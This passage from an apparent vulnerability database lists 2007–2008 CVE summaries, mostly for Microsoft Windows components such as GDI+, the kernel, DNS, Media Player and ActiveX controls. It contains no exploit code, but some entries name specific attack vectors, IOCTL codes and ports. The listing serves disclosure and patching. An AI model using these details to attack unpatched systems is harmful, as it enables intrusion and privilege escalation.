Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-3010] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1 and 9 incorrectly associate ISATAP addresses with the Local Intranet zone, which allows remote servers to capture NTLM credentials, and execute arbitrary code through credential-reflection attacks, by sending an authentication request, aka "ISATAP Vulnerability." [CVE-2008-3009] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1, 9, and 2008 do not properly use the Service Principal Name (SPN) identifier when validating replies to authentication requests, which allows remote servers to execute arbitrary code via vectors that employ NTLM credential reflection, aka "SPN Vulnerability." [CVE-2008-3008] Stack-based buffer overflow in the WMEncProfileManager ActiveX control in wmex.dll in Microsoft Windows Media Encoder 9 Series allows remote attackers to execute arbitrary code via a long first argument to the GetDetailsString method, aka "Windows Media Encoder Buffer Overrun Vulnerability." [CVE-2008-2547] Stack-based buffer overflow in msiexec.exe 3.1.4000.1823 and 4.5.6001.22159 in Microsoft Windows Installer allows context-dependent attackers to execute arbitrary code via a long GUID value for the /x (aka /uninstall) option. NOTE: this issue might cross privilege boundaries if msiexec.exe is reachable via components such as ActiveX controls, and might additionally require a separate vulnerability in the control. [CVE-2008-2540] Apple Safari on Mac OS X, and before 3.1.2 on Windows, does not prompt the user before downloading an object that has an unrecognized content type, which allows remote attackers to place malware into the (1) Desktop directory on Windows or (2) Downloads directory on Mac OS X, and subsequently allows remote attackers to execute arbitrary code on Windows by leveraging an untrusted search path vulnerability in (a) Internet Explorer 7 on Windows XP or (b) the SearchPath function in Windows XP, Vista, and Server 2003 and 2008, aka a "Carpet Bomb" and a "Blended Threat Elevation of Privilege Vulnerability," a different issue than CVE-2008-1032. NOTE: Apple considers this a vulnerability only because the Microsoft products can load application libraries from the desktop and, as of 20080619, has not covered the issue in an advisory for Mac OS X. [CVE-2008-2253] Unspecified vulnerability in Microsoft Windows Media Player 11 allows remote attackers to execute arbitrary code via a crafted audio-only file that is streamed from a Server-Side Playlist (SSPL) on Windows Media Server, aka "Windows Media Player Sampling Rate Vulnerability." [CVE-2008-2252] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate parameters sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Corruption Vulnerability." [CVE-2008-2251] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that makes system calls within multiple threads, aka "Windows Kernel Unhandled Exception Vulnerability." NOTE: according to Microsoft, this is not a duplicate of CVE-2008-4510. [CVE-2008-2250] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability." [CVE-2008-2249] Integer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a malformed header in a crafted WMF file, which triggers a buffer overflow, aka "GDI Integer Overflow Vulnerability." [CVE-2008-2246] Microsoft Windows Vista through SP1 and Server 2008 do not properly import the default IPsec policy from a Windows Server 2003 domain to a Windows Server 2008 domain, which prevents IPsec rules from being enforced and allows remote attackers to bypass intended access restrictions. [CVE-2008-2245] Heap-based buffer overflow in the InternalOpenColorProfile function in mscms.dll in Microsoft Windows Image Color Management System (MSCMS) in the Image Color Management (ICM) component on Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted image file. [CVE-2008-2160] Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted (1) JPEG and (2) GIF images. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1457] The Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate per-user subscriptions, which allows remote authenticated users to execute arbitrary code via a crafted event subscription request. [CVE-2008-1456] Array index vulnerability in the Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote authenticated users to execute arbitrary code via a crafted event subscription request that is used to access an array of function pointers. [CVE-2008-1454] Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447. [CVE-2008-1453] The Bluetooth stack in Microsoft Windows XP SP2 and SP3, and Vista Gold and SP1, allows physically proximate attackers to execute arbitrary code via a large series of Service Discovery Protocol (SDP) packets. [CVE-2008-1451] The WINS service on Microsoft Windows 2000 SP4, and Server 2003 SP1 and SP2, does not properly validate data structures in WINS network packets, which allows local users to gain privileges via a crafted packet, aka "Memory Overwrite Vulnerability." [CVE-2008-1448] The MHTML protocol handler in a component of Microsoft Outlook Express 5.5 SP2 and 6 through SP1, and Windows Mail, does not assign the correct Internet Explorer Security Zone to UNC share pathnames, which allows remote attackers to bypass intended access restrictions and read arbitrary files via an mhtml: URI in conjunction with a redirection, aka "URL Parsing Cross-Domain Information Disclosure Vulnerability." [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-1444] Stack-based buffer overflow in Microsoft DirectX 7.0 and 8.1 on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a Synchronized Accessible Media Interchange (SAMI) file with crafted parameters for a Class Name variable, aka the "SAMI Format Parsing Vulnerability." [CVE-2008-1441] Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system hang) via a series of Pragmatic General Multicast (PGM) packets with invalid fragment options, aka the "PGM Malformed Fragment Vulnerability." [CVE-2008-1440] Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability." [CVE-2008-1436] Microsoft Windows XP Professional SP2, Vista, and Server 2003 and 2008 does not properly assign activities to the (1) NetworkService and (2) LocalService accounts, which might allow context-dependent attackers to gain privileges by using one service process to capture a resource from a second service process that has a LocalSystem privilege-escalation ability, related to improper management of the SeImpersonatePrivilege user right, as originally reported for Internet Information Services (IIS), aka Token Kidnapping. [CVE-2008-1435] Windows Explorer in Microsoft Windows Vista up to SP1, and Server 2008, allows user-assisted remote attackers to execute arbitrary code via crafted saved-search (.search-ms) files that are not properly handled when saving, aka "Windows Saved Search Vulnerability." [CVE-2008-1087] Stack-based buffer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF image file with crafted filename parameters, aka "GDI Stack Overflow Vulnerability." [CVE-2008-1086] The HxTocCtrl ActiveX control (hxvz.dll), as used in Microsoft Internet Explorer 5.01 SP4 and 6 SP1, in Windows XP SP2, Server 2003 SP1 and SP2, Vista SP1, and Server 2008, allows remote attackers to execute arbitrary code via malformed arguments, which triggers memory corruption. [CVE-2008-1084] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys. [CVE-2008-1083] Heap-based buffer overflow in the CreateDIBPatternBrushPt function in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF or WMF image file with a malformed header that triggers an integer overflow, aka "GDI Heap Overflow Vulnerability." [CVE-2008-0951] Microsoft Windows Vista does not properly enforce the NoDriveTypeAutoRun registry value, which allows user-assisted remote attackers, and possibly physically proximate attackers, to execute arbitrary code by inserting a (1) CD-ROM device or (2) U3-enabled USB device containing a filesystem with an Autorun.inf file, and possibly other vectors related to (a) AutoRun and (b) AutoPlay actions. [CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer. [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2008-0087] The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, and Vista uses predictable DNS transaction IDs, which allows remote attackers to spoof DNS responses. [CVE-2008-0084] Unspecified vulnerability in the TCP/IP support in Microsoft Windows Vista allows remote DHCP servers to cause a denial of service (hang and restart) via a crafted DHCP packet. [CVE-2008-0083] The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2007-6753] Untrusted search path vulnerability in Shell32.dll in Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2008, and Windows 7, when using an environment configured with a string such as %APPDATA% or %PROGRAMFILES% in a certain way, allows local users to gain privileges via a Trojan horse DLL under the current working directory, as demonstrated by iTunes and Safari. [CVE-2007-6401] Stack-based buffer overflow in mplayer2.exe in Microsoft Windows Media Player (WMP) 6.4, when used with the 3ivx 4.5.1 or 5.0.1 codec, allows remote attackers to execute arbitrary code via a certain .mp4 file, possibly a related issue to CVE-2007-6402. [CVE-2007-6332] The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method. [CVE-2007-6236] Microsoft Windows Media Player (WMP) allows remote attackers to cause a denial of service (application crash) via a certain AIFF file that triggers a divide-by-zero error, as demonstrated by kr.aiff. [CVE-2007-6043] The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898. [CVE-2007-5634] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, does not properly check a buffer during an IOCTL 0x9c402420 call, which allows local users to cause a denial of service (machine crash) and possibly gain privileges via unspecified vectors. [CVE-2007-5633] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, allows local users to read or write arbitrary MSRs, and gain privileges and load unsigned drivers, via the (1) IOCTL_RDMSR 0x9C402438 and (2) IOCTL_WRMSR 0x9C40243C IOCTLs to \Device\speedfan, as demonstrated by an IOCTL_WRMSR action on MSR_LSTAR. [CVE-2007-5587] Buffer overflow in Macrovision SafeDisc secdrv.sys before 4.3.86.0, as shipped in Microsoft Windows XP SP2, XP Professional x64 and x64 SP2, Server 2003 SP1 and SP2, and Server 2003 x64 and x64 SP2 allows local users to overwrite arbitrary memory locations and gain privileges via a crafted argument to a METHOD_NEITHER IOCTL, as originally discovered in the wild. [CVE-2007-5460] Microsoft ActiveSync 4.1, as used in Windows Mobile 5.0, uses weak encryption (XOR obfuscation with a fixed key) when sending the user's PIN/Password over the USB connection from the host to the device, which might make it easier for attackers to decode a PIN/Password obtained by (1) sniffing or (2) spoofing the docking process. [CVE-2007-5352] Unspecified vulnerability in Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows local users to gain privileges via a crafted local procedure call (LPC) request. [CVE-2007-5351] Unspecified vulnerability in Server Message Block Version 2 (SMBv2) signing support in Microsoft Windows Vista allows remote attackers to force signature re-computation and execute arbitrary code via a crafted SMBv2 packet, aka "SMBv2 Signing Vulnerability." [CVE-2007-5350] Unspecified vulnerability in the Windows Advanced Local Procedure Call (ALPC) in the kernel in Microsoft Windows Vista allows local users to gain privileges via unspecified vectors involving "legacy reply paths." [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-5145] Multiple buffer overflows in system DLL files in Microsoft Windows XP, as used by Microsoft Windows Explorer (explorer.exe) 6.00.2900.2180, Don Ho Notepad++, unspecified Adobe Macromedia applications, and other programs, allow user-assisted remote attackers to cause a denial of service (application crash) via long strings in the (1) author, (2) title, (3) subject, and (4) comment Properties fields of a file, possibly involving improper handling of extended file attributes by the (a) NtQueryInformationFile, (b) NtQueryDirectoryFile, (c) NtSetInformationFile, (d) FileAllInformation, (e) FileNameInformation, and other FILE_INFORMATION_CLASS functions in ntdll.dll and the (f) GetFileAttributesExW and (g) GetFileAttributesW functions in kernel32.dll, a related issue to CVE-2007-1347. [CVE-2007-5133] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service (CPU consumption) via a certain PNG file with a large tEXt chunk that possibly triggers an integer overflow in PNG chunk size handling, as demonstrated by badlycrafted.png. [CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file. [CVE-2007-4414] Cisco VPN Client on Windows before 4.8.02.0010 allows local users to gain privileges by enabling the "Start Before Logon" (SBL) and Microsoft Dial-Up Networking options, and then interacting with the dial-up networking dialog box. [CVE-2007-4288] Microsoft Windows Media Player 11 (wmplayer.exe) allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .au file that triggers a divide-by-zero error, as demonstrated by iapetus.au. [CVE-2007-4247] Windows Calendar on Microsoft Windows Vista allows remote attackers to cause a denial of service (NULL dereference and persistent application crash) via a malformed ICS file. [CVE-2007-4227] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain JPG file, as demonstrated by something.jpg. NOTE: this issue might be related to CVE-2007-3958. [CVE-2007-3958] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain GIF file, as demonstrated by Art.gif. [CVE-2007-3898] The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors. [CVE-2007-3897] Heap-based buffer overflow in Microsoft Outlook Express 6 and earlier, and Windows Mail for Vista, allows remote Network News Transfer Protocol (NNTP) servers to execute arbitrary code via long NNTP responses that trigger memory corruption. [CVE-2007-3896] The URL handling in Shell32.dll in the Windows shell in Microsoft Windows XP and Server 2003, with Internet Explorer 7 installed, allows remote attackers to execute arbitrary programs via invalid "%" sequences in a mailto: or other URI handler, as demonstrated using mIRC, Outlook, Firefox, Adobe Reader, Skype, and other applications. NOTE: this issue might be related to other issues involving URL handlers in Windows systems, such as CVE-2007-3845. There also might be separate but closely related issues in the applications that are invoked by the handlers. [CVE-2007-3826] Microsoft Internet Explorer 7 on Windows XP SP2 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via repeated document.open function calls after a user requests a new page, but before the onBeforeUnload function is called. [CVE-2007-3724] The process scheduler in the Microsoft Windows XP kernel does not make use of the process statistics kept by the kernel, performs scheduling based on CPU billing gathered from periodic process sampling ticks, and gives preference to "interactive" processes that perform voluntary sleeps, which allows local users to cause a denial of service (CPU consumption), as described in "Secretly Monopolizing the CPU Without Superuser Privileges." [CVE-2007-3671] Unspecified vulnerability in the kernel in Microsoft Windows Vista has unspecified remote attack vectors and impact, as shown in the "0day IPO" presentation at SyScan'07. [CVE-2007-3463] DISPUTED Microsoft Windows XP SP2 allows local users, who have sessions created by another user's RunAs (run as) command, to kill arbitrary processes of this other user, as demonstrated by the taskkill program. NOTE: the researcher claims a vendor dispute in which the vendor states that "RunAs and UAC are convenience features, not security boundaries. If you need a security guarantee, please log out and log back in with a different account." [CVE-2007-3436] Microsoft MSN Messenger 4.7 on Windows XP allows remote attackers to cause a denial of service (resource consumption) via a flood of SIP INVITE requests to the port specified for voice conversation. [CVE-2007-3406] Multiple absolute path traversal vulnerabilities in Microsoft Internet Explorer 6 on Windows XP SP2 allow remote attackers to access arbitrary local files via the file: URI in the (1) src attribute of a (a) bgsound, (b) input, (c) EMBED, (d) img, or (e) script tag [CVE-2007-3300] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive. [CVE-2007-3040] Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205. [CVE-2007-3039] Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server. [CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability." [CVE-2007-3037] Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that causes a size mismatch between compressed and decompressed data and triggers a heap-based buffer overflow, aka "Windows Media Player Code Execution Vulnerability Parsing Skins." [CVE-2007-3036] Unspecified vulnerability in the (1) Windows Services for UNIX 3.0 and 3.5, and (2) Subsystem for UNIX-based Applications in Microsoft Windows 2000, XP, Server 2003, and Vista allows local users to gain privileges via unspecified vectors related to "certain setuid binary files." [CVE-2007-3035] Unspecified vulnerability in Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that is not properly handled during decompression, aka "Windows Media Player Code Execution Vulnerability Decompressing Skins." [CVE-2007-3034] Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2007-2967] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070522 allow remote attackers to cause a denial of service (file scanning infinite loop) via certain crafted (1) ARJ archives or (2) FSG packed files. [CVE-2007-2966] Buffer overflow in the LHA decompresion component in F-Secure anti-virus products for Microsoft Windows and Linux before 20070529 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted LHA archive, related to an integer wrap, a similar issue to CVE-2006-4335. [CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. [CVE-2007-2730] Check Point ZoneAlarm Pro before 6.5.737.000 does not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2729] Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2593] The Terminal Server in Microsoft Windows 2003 Server, when using TLS, allows remote attackers to bypass SSL and self-signed certificate requirements, downgrade the server security, and possibly conduct man-in-the-middle attacks via unspecified vectors, as demonstrated using the Remote Desktop Protocol (RDP) 6.0 client. NOTE: a third party claims that the vendor may have fixed this in approximately 2006. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2374] Unspecified vulnerability in Microsoft Windows 2000, XP, and Server 2003 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors. NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error. [CVE-2007-2229] Microsoft Windows Vista uses insecure default permissions for unspecified "local user information data stores" in the registry and the file system, which allows local users to obtain sensitive information such as administrative passwords, aka "Permissive User Information Store ACLs Information Disclosure Vulnerability." [CVE-2007-2228] rpcrt4.dll (aka the RPC runtime library) in Microsoft Windows XP SP2, XP Professional x64 Edition, Server 2003 SP1 and SP2, Server 2003 x64 Edition and x64 Edition SP2, and Vista and Vista x64 Edition allows remote attackers to cause a denial of service (RPCSS service stop and system restart) via an RPC request that uses NTLMSSP PACKET authentication with a zero-valued verification trailer signature, which triggers an invalid dereference. NOTE: this also affects Windows 2000 SP4, although the impact is an information leak. [CVE-2007-2227] The MHTML protocol handler in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle Content-Disposition "notifications," which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "Content Disposition Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2225] A component in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle certain HTTP headers when processing MHTML protocol URLs, which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "URL Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2224] Object linking and embedding (OLE) Automation, as used in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Office 2004 for Mac, and Visual Basic 6.0 allows remote attackers to execute arbitrary code via the substringData method on a TextNode object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2221] Unspecified vulnerability in the mdsauth.dll COM object in Microsoft Windows Media Server in the Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-2219] Unspecified vulnerability in the Win32 API on Microsoft Windows 2000, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via certain parameters to an unspecified function. [CVE-2007-2218] Unspecified vulnerability in the Windows Schannel Security Package for Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, allows remote servers to execute arbitrary code or cause a denial of service via crafted digital signatures that are processed during an SSL handshake. [CVE-2007-2217] Kodak Image Viewer in Microsoft Windows 2000 SP4, and in some cases XP SP2 and Server 2003 SP1 and SP2, allows remote attackers to execute arbitrary code via crafted image files that trigger memory corruption, as demonstrated by a certain .tif (TIFF) file. [CVE-2007-1973] Race condition in the Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 allows local users to modify memory and gain privileges via the temporary \Device\PhysicalMemory section handle, a related issue to CVE-2007-1206. [CVE-2007-1946] Integer overflow in Windows Explorer in Microsoft Windows XP SP1 might allow user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large width dimension in a crafted BMP image, as demonstrated by w4intof.bmp. [CVE-2007-1912] Heap-based buffer overflow in Microsoft Windows allows user-assisted remote attackers to have an unknown impact via a crafted .HLP file. [CVE-2007-1765] Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038 [CVE-2007-1763] The ATI kernel driver (atikmdag.sys) in Microsoft Windows Vista allows user-assisted remote attackers to cause a denial of service (crash) via a crafted JPG image, as demonstrated by a slideshow, possibly due to a buffer overflow. [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector. [CVE-2007-1658] Windows Mail in Microsoft Windows Vista might allow user-assisted remote attackers to execute certain programs via a link to a (1) local file or (2) UNC share pathname in which there is a directory with the same base name as an executable program at the same level, as demonstrated using C:/windows/system32/winrm (winrm.cmd) and migwiz (migwiz.exe). [CVE-2007-1645] Buffer overflow in FutureSoft TFTP Server 2000 on Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via a long request on UDP port 69. NOTE: this issue might overlap CVE-2006-4781 or CVE-2005-1812. [CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct 